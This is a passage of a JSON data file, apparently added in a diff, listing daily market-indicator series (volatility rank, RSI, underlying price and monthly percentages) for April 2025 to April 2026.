[ + "2026-01-23", + 13372.125083183764 + ], + [ + "2026-01-26", + 13430.963611475167 + ], + [ + "2026-01-27", + 13552.719313475265 + ], + [ + "2026-01-28", + 13597.5988484257 + ], + [ + "2026-01-29", + 13516.21359976284 + ], + [ + "2026-01-30", + 13353.87222632755 + ], + [ + "2026-02-02", + 13445.565634499042 + ], + [ + "2026-02-03", + 13238.987755796225 + ], + [ + "2026-02-04", + 13007.716224964328 + ], + [ + "2026-02-05", + 12820.46598130201 + ], + [ + "2026-02-06", + 13091.463623482761 + ], + [ + "2026-02-09", + 13191.746070990215 + ], + [ + "2026-02-10", + 13130.545392843238 + ], + [ + "2026-02-11", + 13165.762422578899 + ], + [ + "2026-02-12", + 12897.985178034578 + ], + [ + "2026-02-13", + 12925.471416215136 + ], + [ + "2026-02-17", + 12912.156764862548 + ], + [ + "2026-02-18", + 13008.574472745187 + ], + [ + "2026-02-19", + 12958.755419985651 + ], + [ + "2026-02-20", + 13073.425984724501 + ], + [ + "2026-02-23", + 12914.518914718123 + ], + [ + "2026-02-24", + 13053.240101903144 + ], + [ + "2026-02-25", + 13242.423371530609 + ], + [ + "2026-02-26", + 13082.659366048847 + ], + [ + "2026-02-27", + 13040.785010636891 + ], + [ + "2026-03-02", + 13057.964401614294 + ], + [ + "2026-03-03", + 12918.171060855935 + ], + [ + "2026-03-04", + 13115.085122038503 + ], + [ + "2026-03-05", + 13075.571604176648 + ], + [ + "2026-03-06", + 12878.872761092032 + ], + [ + "2026-03-09", + 13050.877952047571 + ], + [ + "2026-03-10", + 13051.093170145523 + ], + [ + "2026-03-11", + 13049.37536227833 + ], + [ + "2026-03-12", + 12825.404186805634 + ], + [ + "2026-03-13", + 12749.386267536831 + ], + [ + "2026-03-16", + 12892.401318237096 + ], + [ + "2026-03-17", + 12955.319804251267 + ], + [ + "2026-03-18", + 12774.72688626524 + ], + [ + "2026-03-19", + 12734.355120622526 + ], + [ + "2026-03-20", + 12499.002319762389 + ], + [ + "2026-03-23", + 12642.477989684492 + ], + [ + "2026-03-24", + 12556.04430185808 + ], + [ + "2026-03-25", + 12638.608000837776 + ], + [ + "2026-03-26", + 12336.950965837144 + ], + [ + "2026-03-27", + 12095.927693018155 + ], + [ + "2026-03-30", + 12003.474459976454 + ], + [ + "2026-03-31", + 12409.839036547313 + ], + [ + "2026-04-01", + 12563.13993756313 + ], + [ + "2026-04-02", + 12577.545114765708 + ], + [ + "2026-04-06", + 12653.228396138305 + ], + [ + "2026-04-07", + 12655.1640467144 + ], + [ + "2026-04-08", + 13031.428272597868 + ], + [ + "2026-04-09", + 13119.581080596947 + ], + [ + "2026-04-10", + 13138.501900940097 + ], + [ + "2026-04-13", + 13274.387195992955 + ], + [ + "2026-04-14", + 13515.410468811944 + ], + [ + "2026-04-15", + 13704.61867224344 + ], + [ + "2026-04-16", + 13770.625013041035 + ], + [ + "2026-04-17", + 13950.801930191385 + ], + [ + "2026-04-20", + 13906.510308093893 + ], + [ + "2026-04-21", + 13853.619148216636 + ], + [ + "2026-04-22", + 14085.397228962005 + ], + [ + "2026-04-23", + 14006.059176840643 + ] + ], + "monthly_pct": [ + [ + "2025-05-31", + 0.24662697723032423 + ], + [ + "2025-06-30", + 0.2348690548344079 + ], + [ + "2025-07-31", + 0.2583862788740676 + ], + [ + "2025-08-31", + 0.24662697723030202 + ], + [ + "2025-09-30", + 0.24662697723030202 + ], + [ + "2025-10-31", + 0.2701469599276862 + ], + [ + "2025-11-30", + 1.243596258952806 + ], + [ + "2025-12-31", + 0.2583862788740454 + ], + [ + "2026-01-31", + 0.2348690548344523 + ], + [ + "2026-02-28", + 0.867268629046114 + ], + [ + "2026-03-31", + 0.4166022111075085 + ], + [ + "2026-04-30", + 0.7495529312326443 + ] + ], + "ivr": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 50.0 + ], + [ + "2025-04-29", + 50.0 + ], + [ + "2025-04-30", + 50.0 + ], + [ + "2025-05-01", + 50.0 + ], + [ + "2025-05-02", + 50.0 + ], + [ + "2025-05-05", + 50.0 + ], + [ + "2025-05-06", + 50.0 + ], + [ + "2025-05-07", + 50.0 + ], + [ + "2025-05-08", + 50.0 + ], + [ + "2025-05-09", + 50.0 + ], + [ + "2025-05-12", + 50.0 + ], + [ + "2025-05-13", + 50.0 + ], + [ + "2025-05-14", + 50.0 + ], + [ + "2025-05-15", + 50.0 + ], + [ + "2025-05-16", + 50.0 + ], + [ + "2025-05-19", + 50.0 + ], + [ + "2025-05-20", + 50.0 + ], + [ + "2025-05-21", + 50.0 + ], + [ + "2025-05-22", + 50.0 + ], + [ + "2025-05-23", + 100.0 + ], + [ + "2025-05-27", + 100.0 + ], + [ + "2025-05-28", + 100.0 + ], + [ + "2025-05-29", + 98.13560853763677 + ], + [ + "2025-05-30", + 94.47705419833481 + ], + [ + "2025-06-02", + 72.10839216870109 + ], + [ + "2025-06-03", + 59.35981061300848 + ], + [ + "2025-06-04", + 25.53024723768767 + ], + [ + "2025-06-05", + 51.95911192656937 + ], + [ + "2025-06-06", + 51.116098140448685 + ], + [ + "2025-06-09", + 48.086109300986145 + ], + [ + "2025-06-10", + 0.0 + ], + [ + "2025-06-11", + 0.0 + ], + [ + "2025-06-12", + 0.0 + ], + [ + "2025-06-13", + 12.569516515662402 + ], + [ + "2025-06-16", + 22.304270581266852 + ], + [ + "2025-06-17", + 29.316724755564415 + ], + [ + "2025-06-18", + 28.357499783601465 + ], + [ + "2025-06-20", + 16.53604878846068 + ], + [ + "2025-06-23", + 21.63810865591295 + ], + [ + "2025-06-24", + 23.336501380965952 + ], + [ + "2025-06-25", + 0.0 + ], + [ + "2025-06-26", + 0.5122921884163811 + ], + [ + "2025-06-27", + 0.4926519418170729 + ], + [ + "2025-06-30", + 0.017764384463952367 + ], + [ + "2025-07-01", + 6.550103444247908 + ], + [ + "2025-07-02", + 5.7819356352769695 + ], + [ + "2025-07-03", + 9.05875145857824 + ], + [ + "2025-07-07", + 8.619809150422851 + ], + [ + "2025-07-08", + 5.3206162669687 + ], + [ + "2025-07-09", + 6.800810262560299 + ], + [ + "2025-07-10", + 6.409673229284232 + ], + [ + "2025-07-11", + 5.828169407007466 + ], + [ + "2025-07-14", + 5.991963570799676 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.3412175798715295 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.8131367338006287 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 1.5541682101982517 + ], + [ + "2025-08-01", + 21.815226058712227 + ], + [ + "2025-08-04", + 34.32352535541449 + ], + [ + "2025-08-05", + 36.920687553872575 + ], + [ + "2025-08-06", + 41.10078020213085 + ], + [ + "2025-08-07", + 41.071366201187814 + ], + [ + "2025-08-08", + 42.785765688058355 + ], + [ + "2025-08-11", + 43.424033237973525 + ], + [ + "2025-08-12", + 47.84247811790095 + ], + [ + "2025-08-13", + 47.88433705966988 + ], + [ + "2025-08-14", + 46.733238049515855 + ], + [ + "2025-08-15", + 47.92642514018333 + ], + [ + "2025-08-18", + 47.439018174611384 + ], + [ + "2025-08-19", + 53.851872379029075 + ], + [ + "2025-08-20", + 54.75513281159712 + ], + [ + "2025-08-21", + 55.30991454008355 + ], + [ + "2025-08-22", + 62.86967458171495 + ], + [ + "2025-08-25", + 62.89941602348463 + ], + [ + "2025-08-26", + 63.23929572701535 + ], + [ + "2025-08-27", + 63.26178630927465 + ], + [ + "2025-08-28", + 62.96934810000452 + ], + [ + "2025-08-29", + 53.454329905908 + ], + [ + "2025-09-02", + 44.98096517703985 + ], + [ + "2025-09-03", + 45.016161843870925 + ], + [ + "2025-09-04", + 42.24202543342081 + ], + [ + "2025-09-05", + 41.92409857915209 + ], + [ + "2025-09-08", + 39.648820484705624 + ], + [ + "2025-09-09", + 39.411182836437035 + ], + [ + "2025-09-10", + 33.10271256024075 + ], + [ + "2025-09-11", + 34.46220683895274 + ], + [ + "2025-09-12", + 35.04110342489686 + ], + [ + "2025-09-15", + 36.32684875446894 + ], + [ + "2025-09-16", + 36.4001406016818 + ], + [ + "2025-09-17", + 26.67753025654575 + ], + [ + "2025-09-18", + 25.81010646026709 + ], + [ + "2025-09-19", + 23.88976525585179 + ], + [ + "2025-09-22", + 16.362509881063374 + ], + [ + "2025-09-23", + 19.377961864334342 + ], + [ + "2025-09-24", + 20.952811303014187 + ], + [ + "2025-09-25", + 22.983284206959027 + ], + [ + "2025-09-26", + 22.247971561901934 + ], + [ + "2025-09-29", + 11.761630633043007 + ], + [ + "2025-09-30", + 3.7911558612600635 + ], + [ + "2025-10-01", + 2.343327036473845 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 3.299409155641003 + ], + [ + "2025-10-06", + 4.703887359046681 + ], + [ + "2025-10-07", + 8.434799640979787 + ], + [ + "2025-10-08", + 13.229869931754749 + ], + [ + "2025-10-09", + 13.392889152337235 + ], + [ + "2025-10-10", + 67.23148618501497 + ], + [ + "2025-10-13", + 78.29158611208375 + ], + [ + "2025-10-14", + 79.84515076919567 + ], + [ + "2025-10-15", + 80.65715521641378 + ], + [ + "2025-10-16", + 79.2243198856955 + ], + [ + "2025-10-17", + 79.13006814041829 + ], + [ + "2025-10-20", + 82.50046052892112 + ], + [ + "2025-10-21", + 80.9083571161861 + ], + [ + "2025-10-22", + 83.57787609555363 + ], + [ + "2025-10-23", + 84.23775946898137 + ], + [ + "2025-10-24", + 86.25631062464481 + ], + [ + "2025-10-27", + 92.7399938248186 + ], + [ + "2025-10-28", + 93.44043458849539 + ], + [ + "2025-10-29", + 93.39500381204412 + ], + [ + "2025-10-30", + 100.0 + ], + [ + "2025-10-31", + 99.21397093705978 + ], + [ + "2025-11-03", + 98.63650543973615 + ], + [ + "2025-11-04", + 100.0 + ], + [ + "2025-11-05", + 98.37480202236267 + ], + [ + "2025-11-06", + 100.0 + ], + [ + "2025-11-07", + 73.03468381661962 + ], + [ + "2025-11-10", + 73.67992703899637 + ], + [ + "2025-11-11", + 72.42926250771526 + ], + [ + "2025-11-12", + 71.9252909876491 + ], + [ + "2025-11-13", + 82.18142914687277 + ], + [ + "2025-11-14", + 81.42465967909139 + ], + [ + "2025-11-17", + 79.38448336264445 + ], + [ + "2025-11-18", + 82.09651531407546 + ], + [ + "2025-11-19", + 81.32385635053934 + ], + [ + "2025-11-20", + 90.16718353088248 + ], + [ + "2025-11-21", + 88.7816320283116 + ], + [ + "2025-11-24", + 96.0741976541445 + ], + [ + "2025-11-25", + 95.53285995795892 + ], + [ + "2025-11-26", + 97.01328534652863 + ], + [ + "2025-11-28", + 94.51676425759871 + ], + [ + "2025-12-01", + 93.99185741917245 + ], + [ + "2025-12-02", + 94.88590819929415 + ], + [ + "2025-12-03", + 86.68119620816073 + ], + [ + "2025-12-04", + 85.8358595231778 + ], + [ + "2025-12-05", + 77.97575843885217 + ], + [ + "2025-12-08", + 77.73362121345437 + ], + [ + "2025-12-09", + 66.92529545193958 + ], + [ + "2025-12-10", + 67.02435315695196 + ], + [ + "2025-12-11", + 67.30670508093081 + ], + [ + "2025-12-12", + 66.23812458801467 + ], + [ + "2025-12-15", + 66.92846292934554 + ], + [ + "2025-12-16", + 65.00209554999184 + ], + [ + "2025-12-17", + 70.20684863709702 + ], + [ + "2025-12-18", + 74.09114744600438 + ], + [ + "2025-12-19", + 61.22145334293103 + ], + [ + "2025-12-22", + 60.68972072042595 + ], + [ + "2025-12-23", + 45.16291422184713 + ], + [ + "2025-12-24", + 44.498006364582125 + ], + [ + "2025-12-26", + 42.628455682225876 + ], + [ + "2025-12-29", + 42.02360914044271 + ], + [ + "2025-12-30", + 41.912412111843544 + ], + [ + "2025-12-31", + 42.05287654856679 + ], + [ + "2026-01-02", + 41.81216614017335 + ], + [ + "2026-01-05", + 44.19548206947793 + ], + [ + "2026-01-06", + 46.23620744768147 + ], + [ + "2026-01-07", + 46.156130639765884 + ], + [ + "2026-01-08", + 47.08323470248455 + ], + [ + "2026-01-09", + 49.55339846427703 + ], + [ + "2026-01-12", + 49.27506318187831 + ], + [ + "2026-01-13", + 36.524742028849026 + ], + [ + "2026-01-14", + 39.79257829304721 + ], + [ + "2026-01-15", + 39.97824707495373 + ], + [ + "2026-01-16", + 25.961069313909373 + ], + [ + "2026-01-20", + 36.70087985516826 + ], + [ + "2026-01-21", + 36.82328429323839 + ], + [ + "2026-01-22", + 38.00007651523995 + ], + [ + "2026-01-23", + 37.55350635589629 + ], + [ + "2026-01-26", + 37.94622124520444 + ], + [ + "2026-01-27", + 40.41427555420146 + ], + [ + "2026-01-28", + 39.563225707266945 + ], + [ + "2026-01-29", + 40.733670050008094 + ], + [ + "2026-01-30", + 43.300922023999746 + ], + [ + "2026-02-02", + 44.16679830715203 + ], + [ + "2026-02-03", + 50.20822260294272 + ], + [ + "2026-02-04", + 55.49870606471154 + ], + [ + "2026-02-05", + 59.417411807159034 + ], + [ + "2026-02-06", + 71.56156999114008 + ], + [ + "2026-02-09", + 70.59180610933181 + ], + [ + "2026-02-10", + 70.78340808561674 + ], + [ + "2026-02-11", + 71.11179945537837 + ], + [ + "2026-02-12", + 77.5901425958653 + ], + [ + "2026-02-13", + 77.22313116015684 + ], + [ + "2026-02-17", + 77.23939246151843 + ], + [ + "2026-02-18", + 69.29808190520285 + ], + [ + "2026-02-19", + 64.73401102553987 + ], + [ + "2026-02-20", + 65.19368625784261 + ], + [ + "2026-02-23", + 67.57670322769584 + ], + [ + "2026-02-24", + 70.43432105401493 + ], + [ + "2026-02-25", + 73.60248732852361 + ], + [ + "2026-02-26", + 75.47470929095776 + ], + [ + "2026-02-27", + 75.15496696826418 + ], + [ + "2026-03-02", + 72.67659450149434 + ], + [ + "2026-03-03", + 72.95758653862765 + ], + [ + "2026-03-04", + 74.38769445100968 + ], + [ + "2026-03-05", + 67.29980577836191 + ], + [ + "2026-03-06", + 67.98429735032163 + ], + [ + "2026-03-09", + 61.354537213589175 + ], + [ + "2026-03-10", + 59.6492468350821 + ], + [ + "2026-03-11", + 59.19277146171281 + ], + [ + "2026-03-12", + 65.69600862971201 + ], + [ + "2026-03-13", + 56.56399671519302 + ], + [ + "2026-03-16", + 60.09722785672322 + ], + [ + "2026-03-17", + 60.74258422698373 + ], + [ + "2026-03-18", + 64.20725923249226 + ], + [ + "2026-03-19", + 64.10640166735784 + ], + [ + "2026-03-20", + 69.20029092028469 + ], + [ + "2026-03-23", + 70.8569350606121 + ], + [ + "2026-03-24", + 67.93705139382318 + ], + [ + "2026-03-25", + 63.163862712764555 + ], + [ + "2026-03-26", + 72.17252522733904 + ], + [ + "2026-03-27", + 78.44710251510755 + ], + [ + "2026-03-30", + 78.1158790886751 + ], + [ + "2026-03-31", + 100.0 + ], + [ + "2026-04-01", + 98.53021399161764 + ], + [ + "2026-04-02", + 98.66221151309882 + ], + [ + "2026-04-06", + 96.2474295566211 + ], + [ + "2026-04-07", + 92.50708059008002 + ], + [ + "2026-04-08", + 100.0 + ], + [ + "2026-04-09", + 100.0 + ], + [ + "2026-04-10", + 95.07542179578917 + ], + [ + "2026-04-13", + 95.22572917431317 + ], + [ + "2026-04-14", + 97.9821083214526 + ], + [ + "2026-04-15", + 99.92799313037568 + ], + [ + "2026-04-16", + 95.1374626784096 + ], + [ + "2026-04-17", + 95.52925500473681 + ], + [ + "2026-04-20", + 87.07640604484067 + ], + [ + "2026-04-21", + 87.66358451268171 + ], + [ + "2026-04-22", + 87.24541456595864 + ], + [ + "2026-04-23", + 89.23358445504536 + ] + ], + "rsi": [ + [ + "2025-04-24", + 50.0 + ], + [ + "2025-04-25", + 50.0 + ], + [ + "2025-04-28", + 99.77909058505757 + ], + [ + "2025-04-29", + 99.78950970263585 + ], + [ + "2025-04-30", + 99.6920632887655 + ], + [ + "2025-05-01", + 99.72227104433989 + ], + [ + "2025-05-02", + 99.75238908808662 + ], + [ + "2025-05-05", + 95.24102282644206 + ], + [ + "2025-05-06", + 88.52128355409826 + ], + [ + "2025-05-07", + 88.87474945128156 + ], + [ + "2025-05-08", + 89.77039981587744 + ], + [ + "2025-05-09", + 89.27401527377852 + ], + [ + "2025-05-12", + 92.17034655346365 + ], + [ + "2025-05-13", + 92.96666208851674 + ], + [ + "2025-05-14", + 93.26130887416511 + ], + [ + "2025-05-15", + 93.31692368722413 + ], + [ + "2025-05-16", + 93.54444725478156 + ], + [ + "2025-05-19", + 93.5963903312624 + ], + [ + "2025-05-20", + 90.85656395607847 + ], + [ + "2025-05-21", + 80.33443416725981 + ], + [ + "2025-05-22", + 80.65481875354706 + ], + [ + "2025-05-23", + 74.2002509995294 + ], + [ + "2025-05-27", + 78.7988247017787 + ], + [ + "2025-05-28", + 75.98636043166576 + ], + [ + "2025-05-29", + 76.38716503852021 + ], + [ + "2025-05-30", + 75.29913054688694 + ], + [ + "2025-06-02", + 77.05855920989904 + ], + [ + "2025-06-03", + 78.68928839047385 + ], + [ + "2025-06-04", + 79.2599002330387 + ], + [ + "2025-06-05", + 73.51990060541829 + ], + [ + "2025-06-06", + 75.9386807885907 + ], + [ + "2025-06-09", + 76.29325491949976 + ], + [ + "2025-06-10", + 77.87340859480865 + ], + [ + "2025-06-11", + 75.1084265756187 + ], + [ + "2025-06-12", + 75.7522736507445 + ], + [ + "2025-06-13", + 65.91169993828494 + ], + [ + "2025-06-16", + 70.43648787291909 + ], + [ + "2025-06-17", + 63.93989919002058 + ], + [ + "2025-06-18", + 63.83033534307848 + ], + [ + "2025-06-20", + 61.12430551154022 + ], + [ + "2025-06-23", + 65.11833459654389 + ], + [ + "2025-06-24", + 70.09043270705129 + ], + [ + "2025-06-25", + 70.84993844683783 + ], + [ + "2025-06-26", + 73.50660720176624 + ], + [ + "2025-06-27", + 74.43398467943769 + ], + [ + "2025-06-30", + 76.14131922311421 + ], + [ + "2025-07-01", + 69.58607580362956 + ], + [ + "2025-07-02", + 71.73339506087443 + ], + [ + "2025-07-03", + 74.49241257570912 + ], + [ + "2025-07-07", + 68.89405255497142 + ], + [ + "2025-07-08", + 69.07923324809758 + ], + [ + "2025-07-09", + 71.39216502925137 + ], + [ + "2025-07-10", + 70.23459366064954 + ], + [ + "2025-07-11", + 68.36915584868947 + ], + [ + "2025-07-14", + 69.76002638773934 + ], + [ + "2025-07-15", + 70.11901556162763 + ], + [ + "2025-07-16", + 70.54007866466056 + ], + [ + "2025-07-17", + 73.69760727147735 + ], + [ + "2025-07-18", + 72.69301916516308 + ], + [ + "2025-07-21", + 74.69498060605783 + ], + [ + "2025-07-22", + 69.21177621980242 + ], + [ + "2025-07-23", + 71.20731671964347 + ], + [ + "2025-07-24", + 72.11955684279756 + ], + [ + "2025-07-25", + 73.15760020410615 + ], + [ + "2025-07-28", + 74.48878025057897 + ], + [ + "2025-07-29", + 72.56210808284135 + ], + [ + "2025-07-30", + 73.20664835830254 + ], + [ + "2025-07-31", + 66.53937763328716 + ], + [ + "2025-08-01", + 48.83035058743897 + ], + [ + "2025-08-04", + 59.491484159348786 + ], + [ + "2025-08-05", + 54.877129655398676 + ], + [ + "2025-08-06", + 60.8905443992392 + ], + [ + "2025-08-07", + 62.361576191207014 + ], + [ + "2025-08-08", + 66.15352263111251 + ], + [ + "2025-08-11", + 63.93272778999119 + ], + [ + "2025-08-12", + 68.72177053315974 + ], + [ + "2025-08-13", + 68.90093110003409 + ], + [ + "2025-08-14", + 68.24770570148405 + ], + [ + "2025-08-15", + 64.51595092703118 + ], + [ + "2025-08-18", + 64.17503101017843 + ], + [ + "2025-08-19", + 53.761331177346946 + ], + [ + "2025-08-20", + 49.9902932016917 + ], + [ + "2025-08-21", + 47.22512999104658 + ], + [ + "2025-08-22", + 55.93214558723043 + ], + [ + "2025-08-25", + 54.106897943429466 + ], + [ + "2025-08-26", + 56.24120925592881 + ], + [ + "2025-08-27", + 57.067627184038564 + ], + [ + "2025-08-28", + 60.35659214746611 + ], + [ + "2025-08-29", + 52.32423931149453 + ], + [ + "2025-09-02", + 47.45726599044207 + ], + [ + "2025-09-03", + 51.93916957401956 + ], + [ + "2025-09-04", + 56.56568615207028 + ], + [ + "2025-09-05", + 57.27812661698215 + ], + [ + "2025-09-08", + 59.688798322809795 + ], + [ + "2025-09-09", + 61.069474497369214 + ], + [ + "2025-09-10", + 61.235159117819364 + ], + [ + "2025-09-11", + 64.1570572993529 + ], + [ + "2025-09-12", + 66.2483129846353 + ], + [ + "2025-09-15", + 69.92516974880476 + ], + [ + "2025-09-16", + 69.1174910933047 + ], + [ + "2025-09-17", + 67.14655215439855 + ], + [ + "2025-09-18", + 71.14227624147154 + ], + [ + "2025-09-19", + 73.74705646695081 + ], + [ + "2025-09-22", + 75.8167267480667 + ], + [ + "2025-09-23", + 69.1869652211819 + ], + [ + "2025-09-24", + 65.92749571427227 + ], + [ + "2025-09-25", + 62.07344438638052 + ], + [ + "2025-09-26", + 64.21248019245078 + ], + [ + "2025-09-29", + 66.51322049362255 + ], + [ + "2025-09-30", + 67.83642658367205 + ], + [ + "2025-10-01", + 70.07275887515618 + ], + [ + "2025-10-02", + 71.88557500032536 + ], + [ + "2025-10-03", + 67.36703973348266 + ], + [ + "2025-10-06", + 70.87006686784594 + ], + [ + "2025-10-07", + 65.51955798505378 + ], + [ + "2025-10-08", + 70.68181602105999 + ], + [ + "2025-10-09", + 69.48553247243406 + ], + [ + "2025-10-10", + 45.648473850391824 + ], + [ + "2025-10-13", + 55.37654854760851 + ], + [ + "2025-10-14", + 52.154200613603706 + ], + [ + "2025-10-15", + 55.11431254058814 + ], + [ + "2025-10-16", + 53.23984692975436 + ], + [ + "2025-10-17", + 56.081899632184616 + ], + [ + "2025-10-20", + 61.01108625111863 + ], + [ + "2025-10-21", + 60.85647872679759 + ], + [ + "2025-10-22", + 55.29931674061824 + ], + [ + "2025-10-23", + 58.80057637907499 + ], + [ + "2025-10-24", + 62.818024276690835 + ], + [ + "2025-10-27", + 68.40982717293689 + ], + [ + "2025-10-28", + 70.50895668625509 + ], + [ + "2025-10-29", + 71.70378060801298 + ], + [ + "2025-10-30", + 62.41596270576851 + ], + [ + "2025-10-31", + 63.977249188546295 + ], + [ + "2025-11-03", + 65.51481342906033 + ], + [ + "2025-11-04", + 54.78121828919265 + ], + [ + "2025-11-05", + 57.15571290122743 + ], + [ + "2025-11-06", + 49.14873721887083 + ], + [ + "2025-11-07", + 47.94626153310704 + ], + [ + "2025-11-10", + 56.0416927639421 + ], + [ + "2025-11-11", + 54.910031751550186 + ], + [ + "2025-11-12", + 54.559789315582954 + ], + [ + "2025-11-13", + 46.325446043790606 + ], + [ + "2025-11-14", + 46.64005365968731 + ], + [ + "2025-11-17", + 43.53348415792319 + ], + [ + "2025-11-18", + 39.525953765081624 + ], + [ + "2025-11-19", + 42.2967228621354 + ], + [ + "2025-11-20", + 35.341154400915315 + ], + [ + "2025-11-21", + 38.704769450336755 + ], + [ + "2025-11-24", + 48.58340653917153 + ], + [ + "2025-11-25", + 50.69856740395926 + ], + [ + "2025-11-26", + 53.659621055736054 + ], + [ + "2025-11-28", + 56.2773479215203 + ], + [ + "2025-12-01", + 54.88283151323305 + ], + [ + "2025-12-02", + 57.515448151000996 + ], + [ + "2025-12-03", + 58.33933418520138 + ], + [ + "2025-12-04", + 57.87814088963881 + ], + [ + "2025-12-05", + 59.39219461406007 + ], + [ + "2025-12-08", + 58.32551380847183 + ], + [ + "2025-12-09", + 58.83635751209879 + ], + [ + "2025-12-10", + 60.56711937372682 + ], + [ + "2025-12-11", + 58.46787584184793 + ], + [ + "2025-12-12", + 47.92773452332186 + ], + [ + "2025-12-15", + 45.64566936066763 + ], + [ + "2025-12-16", + 46.71899454660168 + ], + [ + "2025-12-17", + 38.95511496425244 + ], + [ + "2025-12-18", + 46.32480227982235 + ], + [ + "2025-12-19", + 52.018136333704845 + ], + [ + "2025-12-22", + 53.97652681542883 + ], + [ + "2025-12-23", + 55.88033440524325 + ], + [ + "2025-12-24", + 57.08031724623279 + ], + [ + "2025-12-26", + 57.04357026669955 + ], + [ + "2025-12-29", + 54.20813649794225 + ], + [ + "2025-12-30", + 52.85889948820763 + ], + [ + "2025-12-31", + 48.25967908271054 + ], + [ + "2026-01-02", + 47.231073654652754 + ], + [ + "2026-01-05", + 51.76237360380834 + ], + [ + "2026-01-06", + 56.27126589166128 + ], + [ + "2026-01-07", + 56.75235578598161 + ], + [ + "2026-01-08", + 53.03488762183157 + ], + [ + "2026-01-09", + 58.17147388559157 + ], + [ + "2026-01-12", + 58.5819512685294 + ], + [ + "2026-01-13", + 57.495244589795114 + ], + [ + "2026-01-14", + 50.27100327423319 + ], + [ + "2026-01-15", + 52.41725744352951 + ], + [ + "2026-01-16", + 51.85525056180009 + ], + [ + "2026-01-20", + 40.1013876890846 + ], + [ + "2026-01-21", + 48.00508983513797 + ], + [ + "2026-01-22", + 51.742492246819566 + ], + [ + "2026-01-23", + 53.323262933392996 + ], + [ + "2026-01-26", + 55.51699509470088 + ], + [ + "2026-01-27", + 59.734260943216086 + ], + [ + "2026-01-28", + 61.194661729284974 + ], + [ + "2026-01-29", + 57.14693350942553 + ], + [ + "2026-01-30", + 50.037118477223174 + ], + [ + "2026-02-02", + 53.55211498154961 + ], + [ + "2026-02-03", + 45.74406543516551 + ], + [ + "2026-02-04", + 38.905031625802266 + ], + [ + "2026-02-05", + 34.41826148535826 + ], + [ + "2026-02-06", + 44.41022361793613 + ], + [ + "2026-02-09", + 47.59227548070815 + ], + [ + "2026-02-10", + 45.86673119499465 + ], + [ + "2026-02-11", + 47.05628803916824 + ], + [ + "2026-02-12", + 39.88025398849115 + ], + [ + "2026-02-13", + 40.87692123704963 + ], + [ + "2026-02-17", + 40.52643527227851 + ], + [ + "2026-02-18", + 44.25394092888129 + ], + [ + "2026-02-19", + 42.76258389579081 + ], + [ + "2026-02-20", + 47.175317774297476 + ], + [ + "2026-02-23", + 42.30763348881604 + ], + [ + "2026-02-24", + 47.40917914659372 + ], + [ + "2026-02-25", + 53.45408584156084 + ], + [ + "2026-02-26", + 48.395116066582084 + ], + [ + "2026-02-27", + 47.135937831689326 + ], + [ + "2026-03-02", + 47.73673314705732 + ], + [ + "2026-03-03", + 43.41308759694169 + ], + [ + "2026-03-04", + 50.2486906147757 + ], + [ + "2026-03-05", + 48.97034682672318 + ], + [ + "2026-03-06", + 43.09312958565454 + ], + [ + "2026-03-09", + 48.87174708554506 + ], + [ + "2026-03-10", + 48.878742004663245 + ], + [ + "2026-03-11", + 48.82132879563378 + ], + [ + "2026-03-12", + 41.909315090662794 + ], + [ + "2026-03-13", + 39.847252204726225 + ], + [ + "2026-03-16", + 45.30015650420609 + ], + [ + "2026-03-17", + 47.55271769120918 + ], + [ + "2026-03-18", + 42.18317924637576 + ], + [ + "2026-03-19", + 41.06679390827159 + ], + [ + "2026-03-20", + 35.21569556715565 + ], + [ + "2026-03-23", + 40.75717740743673 + ], + [ + "2026-03-24", + 38.61431673656675 + ], + [ + "2026-03-25", + 41.76403626494997 + ], + [ + "2026-03-26", + 34.748648157122034 + ], + [ + "2026-03-27", + 30.36043749594191 + ], + [ + "2026-03-30", + 28.85514590350796 + ], + [ + "2026-03-31", + 42.378277403552275 + ], + [ + "2026-04-01", + 46.50901777091294 + ], + [ + "2026-04-02", + 46.89426688706331 + ], + [ + "2026-04-06", + 48.973590659036056 + ], + [ + "2026-04-07", + 49.02855984501532 + ], + [ + "2026-04-08", + 58.408138088038406 + ], + [ + "2026-04-09", + 60.25350670187023 + ], + [ + "2026-04-10", + 60.65699485840208 + ], + [ + "2026-04-13", + 63.521111821731104 + ], + [ + "2026-04-14", + 67.97449809049708 + ], + [ + "2026-04-15", + 70.9705744660592 + ], + [ + "2026-04-16", + 71.9562268122709 + ], + [ + "2026-04-17", + 74.50130671316494 + ], + [ + "2026-04-20", + 72.75337195184355 + ], + [ + "2026-04-21", + 70.62253213851496 + ], + [ + "2026-04-22", + 74.18999686741846 + ], + [ + "2026-04-23", + 71.01117717347967 + ] + ], + "underlying": [ + [ + "2025-04-24", + 25.888994216918945 + ], + [ + "2025-04-25", + 26.743022918701172 + ], + [ + "2025-04-28", + 26.723163604736328 + ], + [ + "2025-04-29", + 27.244516372680664 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18792152404785 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997262954711914 + ], + [ + "2025-05-06", + 28.17302703857422 + ], + [ + "2025-05-07", + 28.500734329223633 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280284881591797 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574142456055 + ], + [ + "2025-05-15", + 35.044979095458984 + ], + [ + "2025-05-16", + 35.476959228515625 + ], + [ + "2025-05-19", + 35.5713005065918 + ], + [ + "2025-05-20", + 35.19890213012695 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.907928466796875 + ], + [ + "2025-05-23", + 32.92976760864258 + ], + [ + "2025-05-27", + 35.223731994628906 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.94070816040039 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.38560485839844 + 